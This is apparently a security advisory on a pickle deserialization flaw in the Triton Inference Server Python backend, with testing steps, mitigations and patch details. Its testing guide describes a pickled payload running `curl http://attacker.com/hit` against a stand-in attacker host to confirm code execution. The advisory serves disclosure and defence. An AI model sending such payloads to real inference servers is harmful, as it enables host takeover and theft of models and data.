NVIDIA Triton Inference Server Custom Python Backend Deserialization Leads to RCE
Overview
A critical remote code execution vulnerability was identified in the Python backend of NVIDIA's Triton Inference Server. The vulnerability originates from the unsafe deserialization of model inputs when a custom Python model is configured to accept `numpy` arrays with `dtype=object`. An attacker can send a specially crafted inference request where the input tensor contains a serialized Python object using `pickle`. The Triton Python backend, when attempting to construct the numpy array from this input, would implicitly call a vulnerable deserialization function. This allows the attacker to execute arbitrary Python code with the permissions of the `tritonserver` process. A successful exploit grants the attacker full control over the inference server host, enabling them to steal or tamper with all models loaded on the server, intercept inference requests and responses, or use the compromised host as a pivot point to attack the internal network. This vulnerability affects self-hosted deployments of Triton and poses a severe risk to MLOps infrastructure.
Affected Systems
Testing Guide
1. **Setup:** Deploy a vulnerable version of Triton with a custom Python model that accepts an input with `dtype=object`. 2. **Create Payload:** Use a tool like `ysoserial` or a simple Python script to create a pickled payload that executes a command, e.g., `os.system('curl http://attacker.com/hit')`. 3. **Send Request:** Craft an inference request that sends the pickled payload as the input tensor data. 4. **Verify:** Monitor your callback server (`attacker.com`) for an incoming HTTP request from the Triton server, confirming code execution.
Mitigation Steps
1. **Upgrade Triton:** Update to NVIDIA Triton Inference Server version 2.50.0 or later. 2. **Avoid Object DTypes:** Do not use `dtype=object` for inputs in your Python backend model configurations unless absolutely necessary. Prefer fixed-size data types. 3. **Use Sandboxing:** Run the Triton Inference Server in a container with security profiles like AppArmor or SECCOMP, or within a sandboxed environment like gVisor, to limit the impact of a potential compromise. 4. **Network Segmentation:** Restrict network access to the Triton server's inference ports, allowing connections only from trusted application frontends.
Patch Details
Patched in Triton Inference Server 2.50.0. The fix involves adding a configuration flag to disable object deserialization and making safer parsing the default behavior.